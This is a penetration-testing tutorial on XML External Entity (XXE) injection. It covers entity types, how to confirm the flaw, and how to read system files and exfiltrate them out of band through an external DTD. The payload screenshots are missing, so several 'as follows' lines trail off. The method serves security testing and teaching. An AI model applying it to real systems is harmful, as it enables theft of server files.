In this article, we will have an in-depth look at how to find and exploit XML External Entity Injection vulnerabilities.

Introduction

XXE (XML External Entity) as the name suggests, is a type of attack relevant to the applications parsing XML data. As per the XML standard specification, an entity can be considered as a type of storage. In programming terms, we can consider an entity as a variable which holds some value. There are two types of entities in XML specification:

Internal Entity:

As per the XML standard, Internal Entity is an entity whose value is defined as a string literal. For example, an entity which is just pointing to a string value can be referred as an Internal Entity. It can be defined as follows:

<!ENTITY internal
“Internal Entity”>

internal = Name of variable

“Internal Entity” = String literal

External Entity:

If the entity is not an Internal Entity, it is an External Entity. External entity can be defined as follows:

<!ENTITY external
SYSTEM|PUBLIC
“http://www.example.com/test.xml”>

An external entity declaration includes as SystemLiteral (SYSTEM) called an entity’s system identifier. When an XML processor parses an entity with SystemLiteral, it resolves the URI reference (http://www.example.com/test.xml) to obtain the input for XML processor to assign a value to “external” variable or any other references defined in XML data. We will discuss this in more details in OOB (Out of Band) XXE exploitation section.

Based on how the entity is declared an entity can further be divided into two types General and Parameterized entity.

General Entity

General entities are the ones which can be referenced with ‘&‘ ampersand sign. The declaration is as follows:

<xml version=”1.0″>

<!DOCTYPE html[

    <!ELEMENT bar>

    <!ENTITY foo “this is foo”>

]>

<bar>&foo;</bar>

Parameterized Entity

Parameterized entities are the ones which can be used to assign values to other entities as well. Parameterized entities have a percent ‘%‘ sign preceding their names during declaration and can be referenced as %(name);. Parameterized entities can generally be found in DTD declaration. The percent ‘%‘ sign tells the XML processor that it is a parameterized entity, insert the replacement value for this entity where ever it is referenced and parse the value of entity as a part of DTD. We will see such entities when dealing with the construction of OOB XXE payloads. Parameterized entities can be defined as follows:

<xml version=”1.0″>

<!DOCTYPE html[

    <!ELEMENT bar>

    <!ENTITY foo “this is foo”>

<!ENTITY another ‘%foo;‘>

]>

<bar>&another;</bar>

Finding XXE Vulnerability

As the XXE vulnerability is relevant only for the applications parsing XML data, the main attack vector when testing an application for XXE vulnerability will be any feature within the application which takes input in XML format. Finding and confirming the vulnerability also depends on the different cases, the application present to us.

Case 1: When the parsed XML data is visible in HTTP response.

If an application is parsing XML data and displaying the result of parsed XML in HTTP response, a basic test case for testing XXE vulnerability would be sending an XXE payload which uses an internal entity, just to ensure whether the application entertains entities or not.

Save the following Php code as xxe.php in the webserver root folder:

Send a POST request to xxe.php file with XML data shown in the following screenshot:

Observe that the application displays username in HTTP response, confirming that it is parsing the XML data.

Now, let’s add an internal entity to XML data and refer the same in <username> element using &u; and send the request again.

Observe the application resolves our internal entity, successfully confirming the XXE vulnerability.

Case 2: When the parsed XML data is not visible in HTTP response.

To emulate an application which does not shows the result of parse XML data in HTTP response, we can simply comment out the echo statement in our Php code used earlier. After commenting out the echo statement, our Php code will look like following.

In this case, we cannot confirm the XXE vulnerability by just using an internal entity as we won’t be able to confirm whether the injected entities are being resolved by the application or not. Let’s quickly test this out.

We will simply send our internal entity payload shown in Case 1.

Observe the application does not show anything in HTTP response body.

Thus, for such cases, we can use an external entity to resolve an URL controlled by us(attacker/vulnerability tester). This way, we can confirm the vulnerability if we received an HTTP request from the vulnerable server to our server.

We will be using a local python server for demonstration purposes. However, you can use any remote server as well. Our request will look like following:

Observe that the application resolves our external entity by sending an HTTP request to our server at localhost listening at port 81. This method of resolving entities to known URL is known as OOB (Out Of Band) XXE.

Data Exfiltration

In this section, we will have a look at how we can use external entities to exfiltrate some sensitive data (for different cases) out of the vulnerable system to understand the overall impact of the vulnerability.

Case 1: When parsed XML data is visible in HTTP response.

With external entities, we can also read system files in the context of permissions assigned to vulnerable application/ XML parser. If you can see the parsed XML data in HTTP response, this means you will be able to see the contents of system files in HTTP response which makes exploitation a lot easier. We will be using the same Php code as of the one used in Case 1 of “Finding XXE Vulnerability” section.

Our request for reading system file using external entity will look like following:

Note in above payload; we are abusing the protocol type (using file:// instead of http://) in URL to read system files.

Mobile Device Penetration Testing

Case 2: When parsed XML data is not visible in HTTP response (OOB XXE)

This is the most common case you will encounter during your Application Security engagements. In this case, we will make use of parameterized entities to build our payload and learn some concepts on the way. The idea here is to store the content of the file in some variable and resolve that variable in an HTTP request to send the contents of file to our server.

Let’s build our payload step by step and understand how and why of our payload. We simply defined a file variable to store the contents of win.ini and a req variable to send the contents to our server.

Let’s try to use this payload in our vulnerable Php file from Case 2 of “Finding XXE Vulnerability” section. Our request payload will look like following:

We got the following error from Php interpreter which states our URL is invalid.

To overcome the above error, we used an internal entity nested with external entity and triggered the request again. Our request payload will look like following:

However, this time we got a different error, which simply means we cannot reference parameterized entities in an internal document type declaration.

We can overcome the above restriction by using an external DTD. We created an xxe.dtd file at our server listening at localhost:81 with following contents:

Our final request with XML payload will look like following. The payload resolves the reference to external DTD (%dtd) and the references defined in DTD file xxe.dtd (%all;
%req;) as well.

Observe the application resolves all the references in our DTD file as well as in request and sends back the base64 encoded contents of win.ini file which can be decoded later to get the original contents.

References

  • https://www.w3.org/TR/xml/#wfc-PEinInternalSubset
  • https://www.w3.org/TR/xml
  • https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf